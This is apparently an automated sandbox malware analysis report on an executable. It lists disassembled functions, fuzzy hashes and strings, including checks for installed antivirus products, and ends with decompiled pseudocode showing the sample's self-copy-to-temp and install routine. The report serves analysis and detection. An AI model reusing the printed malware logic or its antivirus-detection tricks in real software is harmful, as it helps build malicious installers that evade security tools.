                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prologlstrlen
                                                                                                                                                • String ID: |P
                                                                                                                                                • API String ID: 2133942097-2149487505
                                                                                                                                                • Opcode ID: e050ae82504ed67cb3a527a31c56f4d773e484cb5ab18c060c9b0a5f63902725
                                                                                                                                                • Instruction ID: 140664ee0f10c41121dd8b7745b289536e9fbea1c81877f94128f894c16aa420
                                                                                                                                                • Opcode Fuzzy Hash: e050ae82504ed67cb3a527a31c56f4d773e484cb5ab18c060c9b0a5f63902725
                                                                                                                                                • Instruction Fuzzy Hash: 3F117F72900114ABCB00EF66DC459BFB7B8FB48715B10492BF412B7192D7399A11DB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041CA60, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041CA65
                                                                                                                                                  • Part of subcall function 004067A9: _memset.LIBCMT ref: 004067BD
                                                                                                                                                  • Part of subcall function 0041CB07: __vsnprintf.LIBCMT ref: 0041CB42
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog__vsnprintf_memset
                                                                                                                                                • String ID: %02X$|P
                                                                                                                                                • API String ID: 872799359-1763487820
                                                                                                                                                • Opcode ID: f0770b7365e0d1d6f988adab4db0f2f478c5c36a7ef698e3a30a893f62f7f34c
                                                                                                                                                • Instruction ID: b0c82a78e53923e2ffe2b09d9954d42280c2a1fb55c00a8c8c1a59134d88e49a
                                                                                                                                                • Opcode Fuzzy Hash: f0770b7365e0d1d6f988adab4db0f2f478c5c36a7ef698e3a30a893f62f7f34c
                                                                                                                                                • Instruction Fuzzy Hash: 81118676A00514AFDB00EF99D846BBEB7A9EF84329F10442EF455E72C1C7785A118B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004AC29E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _strlen.LIBCMT ref: 004AC2BD
                                                                                                                                                • __time64.LIBCMT ref: 004AC2E6
                                                                                                                                                  • Part of subcall function 0049301E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0041906C,00000000,?,00418FBD,?), ref: 00493027
                                                                                                                                                  • Part of subcall function 004B39D3: _strlen.LIBCMT ref: 004B3A16
                                                                                                                                                Strings
                                                                                                                                                • Hostname in DNS cache was stale, zapped, xrefs: 004AC307
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time_strlen$FileSystem__time64
                                                                                                                                                • String ID: Hostname in DNS cache was stale, zapped
                                                                                                                                                • API String ID: 2130245216-222773601
                                                                                                                                                • Opcode ID: ba568b7b5327ce90ce4220406ccc92b893be42d7ab30b0ab5a34c48ce39f26a9
                                                                                                                                                • Instruction ID: 209fe19511b35c37028c6dc2dd3dfbb30b0d231fd6eadc7a323116ae77074d75
                                                                                                                                                • Opcode Fuzzy Hash: ba568b7b5327ce90ce4220406ccc92b893be42d7ab30b0ab5a34c48ce39f26a9
                                                                                                                                                • Instruction Fuzzy Hash: D811C276900208ABDF50AB66CC85E9F77BCEF95314B50446EF80192152EB39EE059B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041CBC0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __wcsicmp
                                                                                                                                                • String ID: %02X$dll
                                                                                                                                                • API String ID: 1389419275-3502532328
                                                                                                                                                • Opcode ID: d0c878bc02b5ab4fc705529d755ceff28a1d065dbb901079d88d0921b4a23e19
                                                                                                                                                • Instruction ID: 8af1641381d4a3440373d22551ecb88075e96fdb8c739d2d4d5911e629649626
                                                                                                                                                • Opcode Fuzzy Hash: d0c878bc02b5ab4fc705529d755ceff28a1d065dbb901079d88d0921b4a23e19
                                                                                                                                                • Instruction Fuzzy Hash: C701A5721043015ADB25EB69CDC499B73FC9F80314B104C3FB685A2091F778A88587A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040E3FA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040E3FF
                                                                                                                                                • StrToIntW.SHLWAPI(00000000,?,004FC0AC,?,http=,?,?,0040E3BD,?,?,?), ref: 0040E464
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog
                                                                                                                                                • String ID: http=
                                                                                                                                                • API String ID: 3519838083-2945583409
                                                                                                                                                • Opcode ID: 721116363b77f45873d6a2edf0de7df3daf7ef0a10cc9f195ba51920cdf674c7
                                                                                                                                                • Instruction ID: 2cbee9b8531c42b54d6c53c9ae6708ed9d9beca5086362a4fc07b242ba37c697
                                                                                                                                                • Opcode Fuzzy Hash: 721116363b77f45873d6a2edf0de7df3daf7ef0a10cc9f195ba51920cdf674c7
                                                                                                                                                • Instruction Fuzzy Hash: C11191329005159BCB20FF69C841A6EB7B4EF40324F104A3FE462B72D1DB79AD408B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004191B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00411A5A: __time64.LIBCMT ref: 00411A65
                                                                                                                                                  • Part of subcall function 0041131B: RegCloseKey.ADVAPI32(00000001,00000000,004124EF,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360,00000001,00000010,00000000,?,?,004123A0,?), ref: 00411325
                                                                                                                                                  • Part of subcall function 0041131B: RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00411337
                                                                                                                                                • RegCloseKey.ADVAPI32(?,SOFTWARE\kingsoft\Antivirus,?,00000000,?,00401686,?,?,?,00000000,00000000,00000004), ref: 00419225
                                                                                                                                                  • Part of subcall function 004115AB: RegQueryValueExW.ADVAPI32(?,uninstall_time,00000000,00000000,?,00000004,00000000,?,00000000), ref: 004115D4
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041920C
                                                                                                                                                Strings
                                                                                                                                                • SOFTWARE\kingsoft\Antivirus, xrefs: 004191D9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$OpenQueryUnothrow_t@std@@@Value__ehfuncinfo$??2@__time64
                                                                                                                                                • String ID: SOFTWARE\kingsoft\Antivirus
                                                                                                                                                • API String ID: 530512226-843249376
                                                                                                                                                • Opcode ID: 87a65506b7199a55d2647d44200a45dea017adc14d36c4ed7c2698bcc35d840b
                                                                                                                                                • Instruction ID: 5a3fc126c6bcf51c3a9eb05916effdca2effe5c21df13178ac54ca3aa62ea988
                                                                                                                                                • Opcode Fuzzy Hash: 87a65506b7199a55d2647d44200a45dea017adc14d36c4ed7c2698bcc35d840b
                                                                                                                                                • Instruction Fuzzy Hash: 6D01B171604305AB8710EF6AAC8189BB7E8FBC4710F000E2FF940D2149D738DD4986AA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00443010, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 00443079
                                                                                                                                                  • Part of subcall function 00425D80: _raise.LIBCMT ref: 00425D9B
                                                                                                                                                Strings
                                                                                                                                                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0044301E
                                                                                                                                                • .\crypto\evp\digest.c, xrefs: 00443028
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset_raise
                                                                                                                                                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                • API String ID: 1484197835-3867593797
                                                                                                                                                • Opcode ID: f25451bf421ff2ef5b5b4dbf5eb5b957afe7247677824db90040374db67df6af
                                                                                                                                                • Instruction ID: 883777eb1845451d5c16c344cc27a0d0233f6473b8f7bab65ba72e43343192fa
                                                                                                                                                • Opcode Fuzzy Hash: f25451bf421ff2ef5b5b4dbf5eb5b957afe7247677824db90040374db67df6af
                                                                                                                                                • Instruction Fuzzy Hash: B8018F787006009FE610DF09DC46E5673E5AFD8745F24846DF68897382E735ED02CBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401372, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog
                                                                                                                                                • String ID: tid$|P
                                                                                                                                                • API String ID: 3519838083-555382461
                                                                                                                                                • Opcode ID: c8365d639fc175b39d64c847f1078550d8ddaf335f2a655ff09257c27547b07e
                                                                                                                                                • Instruction ID: 5a9a305e8c1d855cdf590751af42f18f172e681e6f137ba56d0d579ff672e3f2
                                                                                                                                                • Opcode Fuzzy Hash: c8365d639fc175b39d64c847f1078550d8ddaf335f2a655ff09257c27547b07e
                                                                                                                                                • Instruction Fuzzy Hash: F8011B76610119ABDB00EF99C845BDEB7B8FF48319F04442AE511F7292C7B8AA04CBA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041D0C8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetSystemTime.KERNEL32(?), ref: 0041D132
                                                                                                                                                  • Part of subcall function 0041D221: __EH_prolog.LIBCMT ref: 0041D226
                                                                                                                                                  • Part of subcall function 0041D221: _strlen.LIBCMT ref: 0041D23F
                                                                                                                                                  • Part of subcall function 00407F97: __EH_prolog.LIBCMT ref: 00407F9C
                                                                                                                                                Strings
                                                                                                                                                • WSAGetLastError () = , xrefs: 0041D0FF
                                                                                                                                                • An error occured in WSAStartup operation: , xrefs: 0041D105
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$SystemTime_strlen
                                                                                                                                                • String ID: An error occured in WSAStartup operation: $WSAGetLastError () =
                                                                                                                                                • API String ID: 1905908749-3319688928
                                                                                                                                                • Opcode ID: b3f1452505d542527fff21666500c4711e37efaad5377cbb38a5653cf4ed9e93
                                                                                                                                                • Instruction ID: 37205ca05287dddd3393fcb23e743b5667f609f6c682d0c38d75bd79942174db
                                                                                                                                                • Opcode Fuzzy Hash: b3f1452505d542527fff21666500c4711e37efaad5377cbb38a5653cf4ed9e93
                                                                                                                                                • Instruction Fuzzy Hash: 3FF0A9F2C0431476D6007BB5AC0FCEA379C9D01314B100B5BF924D20C2E97D959451AE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00414027, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041402C
                                                                                                                                                  • Part of subcall function 0048EA0D: _malloc.LIBCMT ref: 0048EA25
                                                                                                                                                • SysAllocString.OLEAUT32(ROOT\CIMV2), ref: 0041405E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocH_prologString_malloc
                                                                                                                                                • String ID: ROOT\CIMV2
                                                                                                                                                • API String ID: 3020083124-2786109267
                                                                                                                                                • Opcode ID: ab3ccce056e26914bd4faedf15037cae8484492423433913b4b15590a135736f
                                                                                                                                                • Instruction ID: 10f010536bc7f061cf3caae313508877cfa12204dadfd3075f0f8d793423cc1e
                                                                                                                                                • Opcode Fuzzy Hash: ab3ccce056e26914bd4faedf15037cae8484492423433913b4b15590a135736f
                                                                                                                                                • Instruction Fuzzy Hash: 23F0FC75900315EBD320AF668945B9B7BA4FF48B29F10831FE6D5A2281D7FC8D408799
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00404646, Relevance: 5.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041D65E: __EH_prolog.LIBCMT ref: 0041D663
                                                                                                                                                • EnterCriticalSection.KERNEL32(00000004,?,00000000,00000004,?,?,?,0040167D,?,?,?,00000000,00000000,00000004), ref: 0040465F
                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000004,?,?,?,0040167D,?,?,?,00000000,00000000,00000004), ref: 0040466E
                                                                                                                                                • EnterCriticalSection.KERNEL32(00000004,?,?,?,0040167D,?,?,?,00000000,00000000,00000004), ref: 0040467E
                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?,?,0040167D,?,?,?,00000000,00000000,00000004), ref: 00404689
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1633115879-0
                                                                                                                                                • Opcode ID: f6153711ccdb9ec2088ee9a632484aae31d8e95bc9136254437890f784a14aa6
                                                                                                                                                • Instruction ID: 3d2d1e2c8219f3d04dcebc83b5ba424c37d8dc528856ef9ac6588cbea51bdbb9
                                                                                                                                                • Opcode Fuzzy Hash: f6153711ccdb9ec2088ee9a632484aae31d8e95bc9136254437890f784a14aa6
                                                                                                                                                • Instruction Fuzzy Hash: 19F0B2B6500218AFCB41EF65DCC1C9EBBACEF482647058167F91597202DB74E9518BE4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Analysis Process: 6852B33702F6B3BD.exe PID: 2124 Parent PID: 5292 6852B33702F6B3BD.exeCOMMON

                                                                                                                                                Executed Functions

                                                                                                                                                Function 100204C0, Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 176COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                			E100204C0(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				long _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				void* __esi;
				void* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				intOrPtr _t73;
				int _t75;
				int _t77;
				void* _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				void* _t125;

				_t125 = __eflags;
				_t100 = __edi;
				_t82 = __ebx;
				_push(0xffffffff);
				_push(E10022D01);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t104;
				_push(_t101);
				E1001FD60();
				_v312 = 0;
				E1000CF20(__edi,  &_v311, 0, 0x103);
				GetModuleFileNameA(0,  &_v312, 0x104);
				E1001A600(__ebx, _t100, _t101, _t125,  &_v44); // executed
				_v8 = 0;
				_t46 = E10001A50( &_v312, E100011E0( &_v44));
				_t108 = _t104 - 0x264 + 0x18;
				_t126 = _t46;
				if(_t46 == 0) {
					_t47 = E1001A0F0("Global\\exist_sign__install_r3");
					_t109 = _t108 + 4;
					__eflags = _t47;
					if(_t47 == 0) {
						_v576 = 0;
						E1000CF20(_t100,  &_v575, 0, 0x103);
						GetTempPathA(0x104,  &_v576);
						E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
						_t111 = _t109 + 0x18;
						CopyFileA( &_v312,  &_v576, 0);
						_v580 = GetTickCount();
						while(1) {
							_t56 = E1001A170( &_v312);
							_t102 = _t56;
							_t57 = E1001A170( &_v576);
							_t111 = _t111 + 8;
							__eflags = _t56 - _t57;
							if(__eflags == 0) {
								break;
							}
							Sleep(0x3e8);
							__eflags = GetTickCount() - _v580 - 0x7530;
							if(__eflags <= 0) {
								continue;
							} else {
							}
							break;
						}
						E1001FDB0();
						E1001FF90(_t82, _t100, _t102, __eflags, "install", "installp3", "-0.3", "46.0.0", "exe");
						_t114 = _t111 + 0x14 - 0x1c;
						_t89 = _t114;
						_v588 = _t114;
						_v612 = E10001160(_t114, __eflags, "status=main_start");
						E10020180(_t82, _t100, _t102, __eflags);
						_t115 = _t114 + 0x1c;
						__eflags = PathFileExistsA("C:\\hijack");
						if(__eflags != 0) {
							L15:
							_t116 = _t115 - 0x1c;
							_v592 = _t116;
							_v616 = E10001160(_t116, __eflags, "status=check_debug");
							E10020180(_t82, _t100, _t102, __eflags);
							_t118 = _t116 + 0x1c - 0x1c;
							_v596 = _t118;
							_v620 = E10001160(_t118, __eflags, "installp3");
							E1001FEA0(_t82, _t100, _t102, __eflags);
							_t120 = _t118 + 0x1c - 0x1c;
							_v600 = _t120;
							_v624 = E10001160(_t120, __eflags, "installp3");
							E1001FDC0(_t82, _t100, _t102, __eflags);
							_v604 = _t120 + 0x1c - 0x1c;
							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
							E10020180(_t82, _t100, _t102, __eflags);
						} else {
							E1001A0A0();
							_t75 = E1001A0B0(_t89);
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
							} else {
								__eflags = E10019D10();
								if(__eflags == 0) {
									_t77 = E1001FA30(_t82, _t100, _t102, __eflags, 0x3e8, 0);
									_t115 = _t115 + 8;
									__eflags = _t77;
									if(__eflags != 0) {
										goto L15;
									} else {
									}
								} else {
									goto L12;
								}
							}
						}
					} else {
					}
					E1001A260();
					_v608 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v608;
				} else {
					E10020A80(__ebx, _t100, _t101, _t126, "46.0.0"); // executed
					_v584 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v584;
				}
				 *[fs:0x0] = _v16;
				return _t73;
			}










































                                                                                                                                                0x100204c0
                                                                                                                                                0x100204c0
                                                                                                                                                0x100204c0
                                                                                                                                                0x100204c3
                                                                                                                                                0x100204c5
                                                                                                                                                0x100204d0
                                                                                                                                                0x100204d1
                                                                                                                                                0x100204de
                                                                                                                                                0x100204df
                                                                                                                                                0x100204e4
                                                                                                                                                0x100204f9
                                                                                                                                                0x1002050f
                                                                                                                                                0x10020519
                                                                                                                                                0x10020521
                                                                                                                                                0x10020538
                                                                                                                                                0x1002053d
                                                                                                                                                0x10020540
                                                                                                                                                0x10020542
                                                                                                                                                0x1002057f
                                                                                                                                                0x10020584
                                                                                                                                                0x10020587
                                                                                                                                                0x10020589
                                                                                                                                                0x10020590
                                                                                                                                                0x100205a5
                                                                                                                                                0x100205b9
                                                                                                                                                0x100205d4
                                                                                                                                                0x100205d9
                                                                                                                                                0x100205ec
                                                                                                                                                0x100205f8
                                                                                                                                                0x100205fe
                                                                                                                                                0x10020605
                                                                                                                                                0x1002060d
